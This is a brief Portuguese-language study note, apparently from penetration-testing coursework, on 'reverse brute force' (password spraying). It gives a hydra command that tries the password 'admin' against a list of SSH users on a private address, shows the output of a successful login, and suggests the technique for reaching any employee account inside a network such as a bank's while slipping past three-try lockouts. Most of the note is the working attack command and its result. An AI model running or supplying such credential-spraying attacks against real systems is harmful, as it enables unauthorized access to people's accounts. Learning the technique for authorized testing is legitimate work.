

Reverse Brute Force

+ Realiza o ataque de força bruta no login e não na senha.

+Exemplo:

→ tentar usar uma senha específica em diversos logins (100928)

+Exemplo didático:

```
hydra -v -L users.txt -p admin 172.16.1.5 ssh
```

→ Essa usabilidade pode ser eficiente quando estamos dentro de redes como a de um banco em que há diversos funcionários e queremos ganhar acesso à conta de qquer um deles [claro, caso o haja sistema de bloqueio para 3 tentativas na senha]

+ Caso funcione, essa será a mensagem exibida:

```
[DATA] max 5 tasks per 1 server, overall 5 tasks, 5 login tries (1.5/p.1), ~1 try per task
[DATA] attacking ssh://172.16.1.5:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://rogerio@172.16.1.5:22
[INFO] Successful, password authentication is supported by ssh://172.16.1.5:22
[22][ssh] host: 172.16.1.5 login: ricardo password: admin
[STATUS] attack finished for 172.16.1.5 (waiting for children to complete tests)
```